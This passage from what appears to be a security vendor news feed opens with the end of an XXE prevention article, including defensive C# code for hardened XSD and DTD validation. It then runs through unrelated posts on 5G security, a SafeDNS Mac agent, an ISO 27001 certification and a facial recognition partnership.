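        "<User><FirstName>" + new string('A', 60) + "</FirstName>" +
        "<LastName>Lovelace</LastName><Address>12 Example Street</Address></User>";

    // Reader settings reused for both the schema and the instance document.
    static XmlReaderSettings SecureSettings() =>
        new XmlReaderSettings { DtdProcessing = DtdProcessing.Prohibit, XmlResolver = null };

    // Load the (hardened) schema from a trusted local copy.
    public static XmlSchemaSet LoadSchema(string xsd)
    {
        // XmlResolver = null: xs:import / xs:include can never be fetched from a third party.
        var schemas = new XmlSchemaSet { XmlResolver = null };
        using (var reader = XmlReader.Create(new StringReader(xsd), SecureSettings()))
        {
            schemas.Add(null, reader);
        }
        schemas.Compile();
        return schemas;
    }

    // The handler the article describes: throw on Error; anything else is only reported.
    static void ValidationEventHandler(object sender, ValidationEventArgs e)
    {
        if (e.Severity == XmlSeverityType.Error)
        {
            throw new XmlSchemaValidationException(e.Message, e.Exception);
        }
        Console.WriteLine("Validation warning: " + e.Message);
    }

    // Parse the document with the hardened reader, then validate it against the schema.
    public static XDocument LoadAndValidate(string xml, XmlSchemaSet schemas)
    {
        XDocument doc;
        using (var reader = XmlReader.Create(new StringReader(xml), SecureSettings()))
        {
            doc = XDocument.Load(reader);
        }
        doc.Validate(schemas, ValidationEventHandler);
        return doc;
    }

    public static void Main()
    {
        XmlSchemaSet schemas = LoadSchema(UserSchema);

        XDocument ok = LoadAndValidate(ValidUser, schemas);
        Console.WriteLine("Valid: " + ok.Root.Element("FirstName").Value);

        try
        {
            LoadAndValidate(InvalidUser, schemas);
        }
        catch (XmlSchemaValidationException ex)
        {
            Console.WriteLine("Rejected: " + ex.Message);
        }
    }
}
```

Two points the article's step list leaves implicit are covered here: the schema itself is loaded through the same hardened reader (a schema file is XML too), and the XmlSchemaSet gets a null XmlResolver so that an xs:import or xs:include in a tampered schema cannot pull in a remote definition.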

How to prevent XXE using DTD validation?

We can also validate an XML file using a DTD. Some differences between XSD and DTD are described on this site.

In this example, I am validating an XML file against a DTD file using DtdProcessing.

Steps:

  • Setting the validation settings using XmlReaderSettings
  • Creating the XmlReader object so I can parse the file using the Read() method
  • Creating the ValidationEventHandler method, which throws an exception if the severity type is Error. All validation logic should go in this method.
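The three steps above, as an added C# example (not the article's own code), using an internal DTD subset embedded in the document rather than a separate DTD file. DtdProcessing.Parse is unavoidable here because the DTD is what the reader validates against, so the protections that remain are a null XmlResolver (no external DTD or external entity is ever fetched) and MaxCharactersFromEntities (a bound on internal entity expansion). The sample documents and element names are constructed for this example.

```csharp
using System;
using System.IO;
using System.Xml;
using System.Xml.Schema;

// Added example, not from the original article: DTD validation with
// XmlReaderSettings while keeping external resolution switched off.
public static class UserDtdValidation
{
    // Constructed sample: a document with an internal DTD subset.
    public const string ValidUser =
        "<?xml version=\"1.0\" encoding=\"utf-8\"?>" +
        "<!DOCTYPE User [" +
        "<!ELEMENT User (FirstName, LastName, Address)>" +
        "<!ELEMENT FirstName (#PCDATA)>" +
        "<!ELEMENT LastName (#PCDATA)>" +
        "<!ELEMENT Address (#PCDATA)>" +
        "]>" +
        "<User><FirstName>Ada</FirstName><LastName>Lovelace</LastName><Address>12 Example Street</Address></User>";

    // Constructed sample: same DTD, but the required Address element is missing.
    public const string InvalidUser =
        "<?xml version=\"1.0\" encoding=\"utf-8\"?>" +
        "<!DOCTYPE User [" +
        "<!ELEMENT User (FirstName, LastName, Address)>" +
        "<!ELEMENT FirstName (#PCDATA)>" +
        "<!ELEMENT LastName (#PCDATA)>" +
        "<!ELEMENT Address (#PCDATA)>" +
        "]>" +
        "<User><FirstName>Ada</FirstName><LastName>Lovelace</LastName></User>";

    // Step 3: the handler throws on Error so invalid input never reaches business logic.
    static void ValidationEventHandler(object sender, ValidationEventArgs e)
    {
        if (e.Severity == XmlSeverityType.Error)
        {
            throw new XmlSchemaValidationException(e.Message, e.Exception);
        }
        Console.WriteLine("Validation warning: " + e.Message);
    }

    // Step 1: the validation settings.
    public static XmlReaderSettings DtdValidationSettings()
    {
        var settings = new XmlReaderSettings
        {
            DtdProcessing = DtdProcessing.Parse,   // required: the DTD is what we validate against
            ValidationType = ValidationType.DTD,
            XmlResolver = null,                    // external DTDs and external entities are never fetched
            MaxCharactersFromEntities = 1024       // bounds internal entity expansion (entity-expansion DoS)
        };
        settings.ValidationEventHandler += ValidationEventHandler;
        return settings;
    }

    // Step 2: create the reader and consume the document with Read(); returns the element count.
    public static int ValidateAndCountElements(string xml)
    {
        int elements = 0;
        using (var reader = XmlReader.Create(new StringReader(xml), DtdValidationSettings()))
        {
            while (reader.Read())
            {
                if (reader.NodeType == XmlNodeType.Element)
                {
                    elements++;
                }
            }
        }
        return elements;
    }

    public static void Main()
    {
        Console.WriteLine("Valid document, elements: " + ValidateAndCountElements(ValidUser));
        try
        {
            ValidateAndCountElements(InvalidUser);
        }
        catch (XmlSchemaValidationException ex)
        {
            Console.WriteLine("Rejected: " + ex.Message);
        }
    }
}
```

Because validation happens while the reader advances, the whole document has to be read through Read() before it can be considered valid; stopping early after the first few elements would skip the content-model errors raised near the end.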

List of SAST tools

SAST tools help you with static application security testing.

SAST tools can be free, commercial, or open-source.

Some of the most popular SAST tools currently are:

  • Veracode
  • LGTM
  • Checkmarx
  • Klocwork
  • Reshift
  • SpectralOps
  • HCL AppScan
  • Codacy
  • Insider CLI
  • Argon


Why is SOAP version < 1.2 vulnerable to XXE attacks, and why should you use later versions?


Before version 1.2, external entities were allowed within SOAP messages.

Since version 1.2 some changes were introduced to the envelope and encoding schemas. Both schemas have been updated to be compliant with the XML Schema Recommendation.

The recommendations that were used are:

· http://www.w3.org/TR/2001/REC-xmlschema-1-20010502/

· http://www.w3.org/TR/2001/REC-xmlschema-2-20010502/

· http://www.w3.org/TR/1999/REC-xml-names-19990114

· http://www.w3.org/TR/2000/REC-xml-20001006

· http://www.w3.org/TR/2000/PR-xlink-20001220/

Additional changes were also made in this version to the names of datatypes in the XML Schema specification, and some datatypes were removed. If you want to check all the changes that were made, you can go to this site.


Conclusion

This article presented some prevention steps that can help you defend your application against XXE attacks.

The OWASP team, which constantly works to discover new ways attackers can exploit your application and perform malicious actions, keeps its Prevention Cheat Sheet up to date.

The best way to secure your application is to always stay up to date with new prevention methods: the best libraries to use, the best detection tools, and so on.

In the end, secure code is the cheapest code!

Cover photo by Joshua Woroniecki

#XXE_attack #XSD #DTD #SAML #vicarius_blog

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

5G Network Security: What You Need to Know

The emergence of 5G wireless technology is no longer news to the world. Organizations and cyber security experts alike look forward to its higher speed, increased capacity, and lower latency. The 5G wireless network also boasts interactive applications, improved communication, increased labor productivity, and lower costs. 

Moreover, 5G intends to provide more extensive broadband access which is good news for gamers, online video content developers, and other multimedia resource users. However, as intriguing as the pros sound, experts warn of its potential downsides.  

An area to critically examine and prepare for is cybersecurity. Online networks and systems have been prone to security vulnerabilities. From 2G to 4G, there have been issues confronting the wireless technology space, and 5G is no different. Also, threat actors are on the prowl as the technology undergoes perfection, ready to strike.  

There’s no telling the extent of the damage in the making, though it’s inevitable that new methods of attack will spring up. There’s also the possibility of cyber criminals amplifying their modes of attack using the new technology. What every enterprise needs is a solid course of action for securing their 5G systems.

In this article, we intend to provide the necessary overview of the security threats facing the 5G network, and the solutions to these threats. Here’s what these threats look like: 

Critical Security Challenges With 5G

Companies must realize that the security challenges associated with 3G and 4G also apply to 5G. Despite its high level of security, 5G may still carry various vulnerabilities to a multitude of attacks. Connecting critical infrastructure over 5G will require top-notch security. Therefore, it becomes expedient to focus on crucial factors such as these to avoid cyber attacks and severe network disruption:

Issues from a Co-existence Between 4G and 5G include:

  • First, enterprises must realize that 5G will require time to evolve alongside 4G, so 4G and 5G will co-exist for a good period of time. However, the transition promises to increase the bandwidth necessary for high performance lacking in the current networks. 
  • Organizations must also note that different operators and countries will move to 5G at their own desired pace. Additionally, Telecom operators must also take care of the security issues that come with the transition and interworking of previous networks. 
  • The co-existence of both networks requires that the security policy for threat detection and mitigation needs consistency and a holistic approach.

Exposure to the Internet of Things (IoT)

The internet of things, which focuses on connectivity and data exchange over the internet, will experience some ruffles. However, the 5G technology will improve some of its use cases. The question here is how prepared organizations are to defend against exposure vulnerabilities. 

IoT products are highly vulnerable devices because of their ease of use and connectivity, which cybercriminals will inevitably exploit to launch attacks. 5G also has enhanced connectivity, making it easy to spread threats via IoT networks. More bandwidth will allow hackers to generate powerful and overwhelming DDoS attacks on any organization’s network and services.

New Attack Openings At The Network Multi-Edge Computing

The edge network moves application hosting and data processing from a centralized point to the network edge. Therefore, when a proper security mechanism is absent, a loss of IP connectivity is likely.

Most edges are susceptible to various attacks from the public internet. There are easy ways for threat actors to infiltrate or attack, such as running third-party applications alongside virtual network functions (VNFs) on a single physical platform.

In addition, rogue base station (RBS) threats have always been a significant source of concern for 4G, which remains a likelihood for 5G. RBS operates by diverting cell phone traffic to the desired location after spoofing the cell phone tower. They meddle with data, steal sensitive information, track users, and more. As a middleman technique, it puts the attacker in the heart of the network and its clients, opening the doors for immeasurable damage.  

Network Slicing & Virtualization

Network slicing is a form of virtualization that allows running multiple logical networks on shared physical network infrastructure. It allows mobile service providers to partition network resources so that they can address various sets of use cases.

Network slicing also allows the authentication of users for only one network area. It makes data and security isolation quite possible. However, the issue is that slices add complexity to the network and can be challenging to manage. Ordinarily, a compromise of any one slice need not impact the others. But operators do not configure just one network; configuration involves many slices with more demanding service requirements.

The 5G networks currently lack precise specifications on developing and implementing security for network slicing. However, there are defining standards and specifications for building the network. The issue is that improper management of the network slice creates avenues for malicious actors to gain access. 

Software-Defined Networking & Network Function Virtualization

Networks built on software-defined networking (SDN) and network function virtualization (NFV) operate differently from traditional networks. NFV infrastructure functions like firewalls, routing, and SD-WAN. It gets installed as software through abstraction. On the other hand, SDN separates a control plane from a forwarding plane.   

Switching to SDN/NFV requires a change in network infrastructure and the appearance of new elements. Both infrastructures pose threats like forwarding device attacks and traffic spoofing.   

Signal Interference 

The 5G technology promises a lot of advantages. However, it also poses a threat to specific sectors. For instance, the transport segment of the economy has raised some concerns. A likely threat to the transport enterprise is the proposed signal interference by the 5G network. There’s a projection of it causing harmful interference to radar altimeters on all civil aircraft types.   

However, interference is not a new phenomenon in the wireless network. Therefore, a need for proper mitigation becomes expedient. Also, other wireless technologies need to pay close attention to site surveys. The goal is to discover the extent of challenges from signal penetration. Both networks operate in the same frequency bands. For this reason, organizations should remember that the same sources of interference affecting 4G are likely with 5G.  

How to Prepare for 5G Network Security Threats 

Without a doubt, 5G is going to be a game-changer. However, security is a critical aspect of its successful delivery of services. Furthermore, the survey conducted by AT&T on 451 respondents shows a high-security threat expectancy. Therefore, stakeholders must carefully plan their security strategies in the 5G evolution roadmap. An excellent place to commence evaluation is the security challenges outlined in this article. 

To create a 5G security position, enterprises need to understand the potential threats. That way, putting up the necessary tools guarantees well-grounded defense. Also, taking advantage of available resources will help to anticipate and further plan for new security threats. One way to begin is to supplement their security with the features already available on the 5G technology. 

Enterprises must understand that identification and authentication will be crucial to 5G security. For this reason, multi-access edge computing nodes and IoT networks should devise vulnerability management programs. Organizations should also consider SDN and virtualization powerful elements in their preparation processes.  

Furthermore, in threat detection and intelligence, machine learning, and other artificial intelligence will come in handy. In addition, a zero-trust environment becomes highly recommended. Finally, due to the large number of devices involved, there’s the need to implement other sophisticated approaches to authorization and identity. 

Remember that organizations should and must take responsibility for covering all security aspects. The time is fast approaching when firewalls will no longer protect everything. Enterprise security teams should look into building 5G private networks to separate the most sensitive elements and other use cases.  

Organizations get to customize build-outs to meet their application requirements. They also function as alternatives to using network slicing for better security. However, given the high cost of building a private 5G network, there is the option of buying or leasing. Whatever the option, the paramount goal needs to be security management. 

5G Network Security: Final Thoughts  

The future of enterprise 5G is more about applications and innovations. Success becomes guaranteed when companies take advantage of speed, low latency, cost-effectiveness, AI collaborations, and more. 

5G security is not only about the right security equipment; it involves collaboration, building workflows, procedures, and more. It’s also about establishing an effective security management process. Other focus areas include spectrum sharing, legacy communications infrastructure, policy, and standard threats.

Security has always mattered in the online technology space, though as breaches and threats become more complex, the stakes become higher. As a result, enterprises need to modernize their approaches to network security to keep their users safe from increasingly innovative threat actors.




About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.

Agent for Mac

SafeDNS has released the new macOS agent. For all Mac users, this means more efficient use of the web filtering software and the option to filter separate devices, which distinguishes agents from browser dashboard access.

The process should be familiar, or simply intuitive for new users. First, you need to register on the website and adjust the settings in your personal account. The next step is installing the Mac agent from the Support tab on the website or from the Dashboard in your account.

The agent enables filtering & allows you to switch between filtering profiles. It can be used within the same tariff on multiple devices. After installation, the agent starts automatically, asking the user for a pin code to change the settings in the agent.

There are several tabs in the agent.

The first tab, Policy, opens by default. In there you select a profile from the list by simply clicking on it.

By clicking on the second tab, System Information, you get a detailed list of system characteristics with network profiles and agent version, protection status, user filtering profiles and much more.

The Debug tab shows the state of interaction of agents with DNS proxy and the ability to send logs to our technical support, which will allow you to understand possible problems in the agent’s work.

On the top panel there is a button for switching the protection status allowing you to disable and enable filtering without logging out.

Below the title of the program there is a user panel that displays the account, IP address, tariff plan and, for most users who have a subscription with an expiration date, the end date of the tariff.

The agent will be available for download tomorrow.


About SafeDNS
SafeDNS breathes to make the internet safer for people all over the world with solutions ranging from AI & ML-powered web filtering, cybersecurity to threat intelligence. Moreover, we strive to create the next generation of safer and more affordable web filtering products. Endlessly working to improve our users’ online protection, SafeDNS has also launched an innovative system powered by continuous machine learning and user behavior analytics to detect botnets and malicious websites.

UnderDefense Achieves ISO 27001:2013, the Leading International Standard Certification

UnderDefense ISO 27001:2013 Certificate

UnderDefense is a Security-as-a-Service (Sec-a-s-S) & Compliance platform that has been giving a stellar performance in security services, meeting and exceeding our clients’ expectations. 

Now we have indisputable proof of our consistent excellence and professional expertise and official confirmation of our risk managing efficiency.

With a sense of immense pride and a thrill of excitement, we would like to report that in November 2021 UnderDefense received ISO 27001:2013 certification which is easily recognized all around the world and increases business opportunities for organizations and professionals. 

After extensive audits carried out by Bureau Veritas Certification Holding SAS-UK Branch, the UnderDefense IS Management System was found to be fully compliant and able to meet all best practices for serving customers’ needs.

This achievement demonstrates UnderDefense’s continued commitment to protecting customers’ most valuable assets because our target is proven excellence for all.

CyberLink’s facial recognition engine FaceMe® to power LILIN’s connected devices, providing businesses with contactless access control management and visitor analytics

TAIPEI, TAIWAN – July 28 2020 – CyberLink Corp. (5203.TW), a pioneer in AI and facial recognition technologies, today announced it has formed a partnership with surveillance solution provider LILIN, leveraging new facial recognition technologies to create comprehensive smart security and retail solutions. CyberLink will license its FaceMe® facial recognition engine to LILIN, powering its NAV Facial Recognition Recorder, creating an all-in-one smart security, data analysis and warning solution.

With the combined technologies, LILIN’s connected video devices can provide businesses with a series of contactless solutions, such as granting verified personnel access to restricted areas within offices, factories or residential buildings through an opt-in photo identification system. The new offering can also provide retailers and hospitality operators with anonymized customer demographics to better understand their customer experience, such as identifying trending emotions patrons may feel when engaged in specific activities or visiting certain areas of a venue.

As the coronavirus pandemic continues to develop across the globe, CyberLink’s and LILIN’s joint facial recognition system uniquely provides businesses seeking contactless solutions the underlying technology to reduce the need for people to touch highly shared surfaces by replacing key cards or PIN passwords with biometric data.

“If there was ever a field worthy of continued research and innovation, it’s security,” said Dr. Jau Huang, CEO of CyberLink. “Without a doubt, LILIN is a global leader and manufacturer of IoT devices, and CyberLink is a worldwide pioneer developing facial recognition applications for connected devices. Together, we are setting a new standard for what makes a place secure by bringing to market new technologies that make our customers safer, and our businesses smarter.”

“LILIN has many years of smart security experience, providing insight into the market’s needs for creating a comprehensive intelligent security solution. LILIN is pleased to partner with CyberLink and integrates FaceMe® into our facial recognition system to strengthen smart retail, smart healthcare, smart factory, and smart business applications. Through continued efforts, I believe that LILIN will provide the most advanced total security solution for global customers.” said Mr. C.C. Hsu, LILIN’s President.

CyberLink and LILIN will host a webinar titled “Facial Recognition x Smart Security: Empowering Smart AIoT Applications” on August 13, 2020 from 14:00-15:00 (GMT+8/Taipei time), further describing the many use cases enabled through the new product offering. For detailed event information and a registration link, please visit: https://is.gd/SfXQ7l

FaceMe’s® edge-based architecture empowers powerful, efficient processing, and higher levels of security compared to Cloud-based solutions. It supports more than 10 operating systems, including Windows, Android, iOS, and various Linux distributions such as Ubuntu x86, Ubuntu ARM, RedHat, CentOS, Yocto, Debian and JetPack. FaceMe’s® high accuracy, flexibility and security makes it the leading facial recognition engine available on the market today, and it is one of the world’s most accurate engines as deemed by the global standard NIST Facial Recognition Vendor Test.


About CyberLink
Founded in 1996, CyberLink Corp. (5203.TW) is the world leader in multimedia software and AI facial recognition technology. CyberLink addresses the demands of consumer, commercial and education markets through a wide range of solutions, covering digital content creation, multimedia playback, video conferencing, live casting, mobile applications and AI facial recognition.  CyberLink has shipped several hundred million copies of its multimedia software and apps, including the award-winning PowerDirector, PhotoDirector, and PowerDVD.  With years of research in the fields of artificial intelligence and facial recognition, CyberLink has developed the FaceMe® Facial Recognition Engine. Powered by deep learning algorithms, FaceMe® delivers the reliable, high-precision, and real-time facial recognition that is critical to AIoT applications such as smart retail, smart security, and surveillance, smart city and smart home. For more information about CyberLink, please visit the official website at www.cyberlink.com